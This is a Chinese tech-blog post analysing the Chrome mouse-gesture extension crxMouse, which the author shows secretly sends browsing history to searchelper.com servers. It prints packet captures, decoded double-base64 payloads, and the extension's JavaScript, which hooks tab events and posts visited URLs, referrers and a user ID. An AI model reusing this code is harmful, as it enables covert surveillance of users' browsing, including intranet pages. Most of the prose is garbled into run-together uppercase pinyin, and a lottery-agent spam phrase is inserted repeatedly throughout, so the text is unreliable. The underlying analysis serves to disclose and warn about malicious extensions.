荣耀彩票代理

IT技术互动交流平台

小心浏览器插件窃取你的隐私

作者:佚名  发布日期:2016-08-02 21:13:28

 浏览器插件已经成为了浏览器荣耀彩票代理的必备品,但是市场上的插件也良莠不齐,甚至部分插件切换用户隐私,如浏览器的历史记录。笔者就遇到了这样一个插件,就是著名的手势插件:crxMouse Chrome Gestures,更可气的是已经用了这个插件一年多了。

1 简单介绍:

荣耀彩票代理   YONGGoogleSOUSUOcrxMouse Chrome GesturesDAOXIANGDAOgoogleSHICHANG,KEYIKANDAOZHEIKUANCHAJIANDEJIANDANJIESHAO。

   YUANMING:Gestures for Chrome(TM)HANHUABAN.FANGBIAN,KUAIJIE,CHONGFENFAJUESHUBIAODESUOYOUCAOZUO.GONGNENGBAOKUO:SHUBIAOSHOUSHI,CHAOJITUOYE,GUNLUNSHOUSHI,YAOGANSHOUSHI,PINGHUAGUNDONG,BIAOQIANYELIEBIAODENG. BENKUOZHANZHILIYUTONGGUOSHUBIAOLAISHIXIANYIXIEGONGNENGCAOZUO,CHONGFENWAJUESHUBIAODESUOYOUCAOZUO.

荣耀彩票代理   GONGNENGBAOKUO:SHUBIAOSHOUSHI,CHAOJITUOYE,GUNLUNSHOUSHI,YAOGANSHOUSHI,PINGHUAGUNDONG,BIAOQIANYELIEBIAODENG

   MUQIANZAIgoogleSHICHANGSHANGZHEIKUANCHAJIANYOU30WANDEYONGHU,LEIJIPINGJIA5000,QIZHONGHENDAYIBUFENSHIGUONEIYONGHU,YINGXIANGHAISHIFEICHANGGUANGFANDE。

   google市场

2 验证窃取行为

   TONGGUOwiresharkZHUABAOKEYIKANDAOLIANGGEFENBIEFASONGDAOs808.searchelper.comHEs1808.searchelper.comDEQINGQIU,ZHIJIESHANGTU:

   s808服务请求

   从origin可以看出,请求是来源于浏览器插件,标记为:jgiplclhploodgnkcljjgddajfbmafmp,可以通过chrome的chrome://extensions/找到该id对应的插件,就是插件显示,其对应的系统目录为

   

C:Users[用户]AppDataLocalGoogleChromeUser DataDefaultExtensionsjgiplclhploodgnkcljjgddajfbmafmp

   

   WOMENKEYITONGGUOFENXIQIDAIMAFAXIANQISHIXIAN,ZHEIGEHOUXUZAIJIANG。XIXINDEDUZHEKENENGHUIKANDAOpostQINGQIUDUANBEIJIAMILE,KANJIEGOUXIANGSHIbase64,CHANGSHIYONGbase64JIEMA,HAISHIbase64BIANMAGESHI,ZAICIJIEMA,DEDAORUXIASHUJU:

荣耀彩票代理   

s=808&md=21&pid=SjOa3PgqWSHYapU&sess=314039255259558500&q=http://bbs.pediy.com/showthread.php?
t=179524&prev=http://bbs.pediy.com/forumdisplay.php?f=161&link=1&sub=chrome&hreferer=http://bbs.pediy.com/forumdisplay.php?
f=161&tmv=3015

   

荣耀彩票代理   s=808JIUDAIBIAOZHEFUWUQIs808,pidJIuserid,sessSHIYONGHUBENDIBIAOJIsession,subDAIBIAOZHELIULANQILEIXING,qDAIBIAODANGQIANYEMIAN,prevDAIBIAOZHECONGNAGEYEMIANGUOLAI,YEJIUSHIrefererDEZUOYONG,hrefererJIUYEJILUZHErefererZIDUANYOULEZHEIXIESHUJUJIUKEYIFENXIYONGHUXINGWEI,KEYIGONGSOUSUOYINQING,QISHIBAIDUTONGJIHEgoogleTONGJIYESHIGANTONGYANGDESHI,SHENZHIBAIDUTONGJIHAIYOUDIANJIDENGDETONGJI。JIUZHEIYANGNIDELIULANXINGWEIBEIFASONGJILEQITAFUWUQI,ZHEIBUSHIZUIWEIXIANDE,ZUIWEIXIANDESHINIZAILIULANNEIWANGDEYIXIEYEMIANYEHUIBEIFASONGCHUQU,NEIWANGDEYIXIEZHANDIANJIUHENRONGYIBEIXIELULE。

   JIEZHEWOMENKANLINGWAIYIGEQINGQIU,ZHEIGEQINGQIUSHIFASONGDAOs1808FUWUQISHANG,JUTIQINGQIURUXIA:

   s1808服务器的请求

   JIEMIJIAMIHOUDENEIRONGHEFASONGDAOs808DEQINGQIUJIBENYIZHI,JUTIRUXIA:

   

s=1808&md=21&pid=SjOa3PgqWSHYapU&sess=765877789119258500&sub=chrome&q=http%3A//bbs.pediy.com/showthread.php%3Ft%
3D179524&hreferer=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%3D161&prev=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%
3D161&tmv=4015&tmf=1

   

荣耀彩票代理   ZHEILIJIUYOUDIANGAOBUTAIQINGCHUFAZHEIYANGYIGEBEIFENQINGQIUDEYUANYINLE,NANDAOJINJINSHIBEIFEN,YOUDAISIKAO,WEILEGENGHAODENONGQINGCHUGAICHAJIANHAIYOUMEIYOUQITAWEIXIANXINGWEI,JIEXIALAIWOMENFENXICHAJIANDESHIXIAN。

3 恶意插件实现

   CHAJIANDEEYIXINGWEIJIZHONGZAIupalytics_ch.jsDAIMAZHONG,ANZHUANGHOUDECHUSHIHUADAIMA:

   

this.initOnceAfterInstall = function() {
    if (!utils.db.get("userid")) {
        var id = utils.createUserID();
        utils.db.set("userid", id)
    }
    if (!utils.db.get("install_time")) {
        var now = (new Date).getTime() / 1E3;
        utils.db.set("install_time", now)
    }
    if (!utils.db_type.get("tmv")) {
        var now = (new Date).getTime() / 1E3;
        utils.db_type.set("tmv", SIM_ModuleConstants._TMV);
    }
};

   

   ZAICHUSHIHUAZHONGSHENGCHENGuserid,HUOQUinstall_time,twvZIDUANCUNFANGZAIBENDIlocalstorageZHONG,JIEZHEHUICHUANGJIANGEZHONGDIAOYONGaddListenerJIEKOULAICHUANGJIANJIANTINGQI,DANGtabYEGENGXIN,TIHUAN,JIHUODESHIHOUJIUHUIDIAOYONGXIANGYINGDEQINGQIUFASONGXIANGYINGDEHANSHU,extension_onRequestZESHIFASONGDAOs808FUWUQI,tabs_onUpdated,tabs_onActivated,tabs_onReplacedZESHIFASONGQINGQIUDAOs1808FUWUQI,JUTIDAIMARUXIA:

   

this.start = function() {
    try {
        chrome.extension.onRequest.addListener(extension_onRequest);
        chrome.tabs.onUpdated.addListener(tabs_onUpdated);
        chrome.tabs.onActivated.addListener(tabs_onActivated);
        chrome.tabs.onReplaced.addListener(tabs_onReplaced)
    } catch (e) {
        log.SEVERE("8835", e)
    }
}

 

   

荣耀彩票代理   XIAMIANWOMENJIANDANFENXIXIAFASONGDAOs808.searchelper.comDErelatedQINGQIUDEDAIMA,YIJIANHUA,JIANHUABUFENZHUYAOSHIQUCHUYIXIEgoogleSOUSUODETIAOZHUAN,QUCHUdocTypeFEIhtmlLEIXINGDE,QUCHUJIANGESHIJIANHENDUANDE。

荣耀彩票代理   

function extension_onRequest(request, sender, sendResponse) {
    var prev_state = tabs_states[tabId];
    tabs_states[tabId] = change_status;
    if (res_prev_url == tab_url && prev_state != change_status){
        log.ERROR("ERROR 8002 ??");
        return
    }
    if(res_prev_url == null || res_prev_url.length == 0) {
        res_prev_url = last_prev;
    }
    last_prev = tab_url;
    var data = "s=" + SIM_Config_BG.getSourceId() + "&md=21&pid=" + utils.db.get("userid") + "&sess=" + SIM_Session.getSessionId() + "&q=" + encodeURIComponent(tab_url) + "&prev=" + encodeURIComponent(res_prev_url) + "&link=" + (ref ? "1" : "0") + "&sub=" + SIM_ModuleConstants.BROWSER + "&hreferer=" + encodeURIComponent(ref);
    data = data + "&tmv=" + SIM_ModuleConstants._TMV;
    data = SIM_Base64.encode(SIM_Base64.encode(data));
    data = "e=" + data;
    var url = utils.db_type.get("server") + "/related";

    utils.net.post(url, "json", data, function(result) {
            log.INFO("Succeeded in posting data");
            tabs_prevs[tabId] = tab_url
            }, function(httpCode) {
            log.INFO("Failed to retrieve content. (HTTP Code:" + httpCode.status + ")");
            log.ERROR("ERROR 8004 ??");
            tabs_prevs[tabId] = tab_url
            })
}

荣耀彩票代理   

荣耀彩票代理   CONGSHANGSHUDAIMAZHONGKEYIKANCHUZAIGUANJIANDELIULANQIDANGQIANurlHErefererDOUJINXINGLELIANGCIbase64BIANMACHULI,KEYITAOGUOYIXIEPUTONGYONGHUDEYANJING,NANDAOZHEIZHONGFANGSHINENGGOUDUOGUOgoogleDEYIXIEZIDONGSHENCHA,BIJIAOHAOQI。

4 建议

   MANONGYEBURONGYI,XINXINKUKUXIECHULAIDECHENGXUBUZHUANQIANZHINENGKAOQIEQUYONGHULIULANLISHIFAJIDISANFANGLAIHUOQUHUIBAO,XIANGBIYESHIPOBUDEYI,DANGRANDUIYUZHEIZHONGQIEQUYINSIDEJUEDUIYAODIZHI。 mouse guestureZUOWEIYIGEHENHAOYONGDETEXING,BIZHEYIJINGNANYILIKAI,SUOYIZAIgoogleSHICHANGSHANGXUANZELEQITADEguestureCHAJIAN。YOULEZHEIGEJIAOXUN,XIANGXINDAJIAYIHOUSHIYONGLIULANQICHAJIANKENDINGHUIDUOZHANGYISHUANGYANJING。

 

Tag标签:         
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规